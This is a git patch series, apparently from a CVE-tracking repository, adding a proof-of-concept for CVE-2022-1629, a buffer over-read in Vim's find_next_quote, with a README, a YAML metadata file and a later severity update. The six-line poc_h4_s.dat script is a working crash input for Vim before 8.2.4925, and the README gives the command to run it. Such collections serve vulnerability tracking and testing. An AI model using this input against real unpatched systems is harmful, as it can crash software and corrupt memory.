From b541355c212947f6e7cc3cef710a02b37d9f9102 Mon Sep 17 00:00:00 2001 From: fionnoif Date: Wed, 15 Mar 2023 19:30:42 +0800 Subject: [PATCH 1/2] ADD CVE_2022_1629 --- cve/vim/2022/CVE-2022-1629/README.md | 14 ++++++++++++++ cve/vim/2022/CVE-2022-1629/poc_h4_s.dat | 6 ++++++ cve/vim/2022/yaml/CVE-2022-1629.yaml | 20 ++++++++++++++++++++ openkylin_list.yaml | 1 + 4 files changed, 41 insertions(+) create mode 100644 cve/vim/2022/CVE-2022-1629/README.md create mode 100644 cve/vim/2022/CVE-2022-1629/poc_h4_s.dat create mode 100644 cve/vim/2022/yaml/CVE-2022-1629.yaml diff --git a/cve/vim/2022/CVE-2022-1629/README.md b/cve/vim/2022/CVE-2022-1629/README.md new file mode 100644 index 00000000..bc146eac --- /dev/null +++ b/cve/vim/2022/CVE-2022-1629/README.md @@ -0,0 +1,14 @@ + +# CVE-2022-1629 Proof-of-Concept + +### Overview + +Buffer Over-read in function find_next_quote in GitHub repository vim/vim prior to 8.2.4925. This vulnerabilities are capable of crashing software, Modify Memory, and possible remote execution +For a comprehensive understanding, check out the accompanying [blog post](https://nvd.nist.gov/vuln/detail/cve-2022-1629) for in-depth details. + +### Usage + +Run the PoC: +``` +vim -u NONE -X -Z -e -s -S ./poc_h4_s.dat -c :qa! +``` diff --git a/cve/vim/2022/CVE-2022-1629/poc_h4_s.dat b/cve/vim/2022/CVE-2022-1629/poc_h4_s.dat new file mode 100644 index 00000000..79ba5fe9 --- /dev/null +++ b/cve/vim/2022/CVE-2022-1629/poc_h4_s.dat @@ -0,0 +1,6 @@ +se encoding=iso8859 +fu R() +sil!normi"\ +cal R() +endf +cal R() \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-1629.yaml b/cve/vim/2022/yaml/CVE-2022-1629.yaml new file mode 100644 index 00000000..a5df9b27 --- /dev/null +++ b/cve/vim/2022/yaml/CVE-2022-1629.yaml @@ -0,0 +1,20 @@ +id: CVE-2022-1629 +source: https://huntr.dev/bounties/e26d08d4-1886-41f0-9af4-f3e1bf3d52ee/ +info: + name: Vim是一款基于UNIX平台的编辑器。 + severity: Medium + description: | + Vim 8.2.4925之前版本存在安全漏洞,该漏洞源于find_next_quote函数的缓冲区过度读取,从而导致软件崩溃、修改内存和远程执行。 + scope-of-influence: + vim< 8.2.4925 + reference: + - https://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2022-1629 + - https://nvd.nist.gov/vuln/detail/CVE-2022-1629 + classification: + cvss-metrics: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H + cvss-score: 6.6 + cve-id: CVE-2022-1629 + cwe-id: CWE-126 + cnvd-id: None + kve-id: None + tags: 缓冲区错误 \ No newline at end of file diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 323454b7..332b6270 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -37,6 +37,7 @@ cve: - CVE-2022-0685 - CVE-2022-0714 - CVE-2022-0729 + - CVE-2022-1629 - CVE-2022-1771 - CVE-2022-2206 - CVE-2022-2257 -- Gitee From 38efd15bf3bc694d06c6610d4a4fafb2f121a83d Mon Sep 17 00:00:00 2001 From: Fionnoif Date: Thu, 16 Mar 2023 01:56:07 +0000 Subject: [PATCH 2/2] update cve/vim/2022/yaml/CVE-2022-1629.yaml. Signed-off-by: Fionnoif --- cve/vim/2022/yaml/CVE-2022-1629.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/cve/vim/2022/yaml/CVE-2022-1629.yaml b/cve/vim/2022/yaml/CVE-2022-1629.yaml index a5df9b27..6949cdb3 100644 --- a/cve/vim/2022/yaml/CVE-2022-1629.yaml +++ b/cve/vim/2022/yaml/CVE-2022-1629.yaml @@ -2,7 +2,7 @@ id: CVE-2022-1629 source: https://huntr.dev/bounties/e26d08d4-1886-41f0-9af4-f3e1bf3d52ee/ info: name: Vim是一款基于UNIX平台的编辑器。 - severity: Medium + severity: High description: | Vim 8.2.4925之前版本存在安全漏洞,该漏洞源于find_next_quote函数的缓冲区过度读取,从而导致软件崩溃、修改内存和远程执行。 scope-of-influence: @@ -11,8 +11,8 @@ info: - https://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2022-1629 - https://nvd.nist.gov/vuln/detail/CVE-2022-1629 classification: - cvss-metrics: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H - cvss-score: 6.6 + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 7.8 cve-id: CVE-2022-1629 cwe-id: CWE-126 cnvd-id: None -- Gitee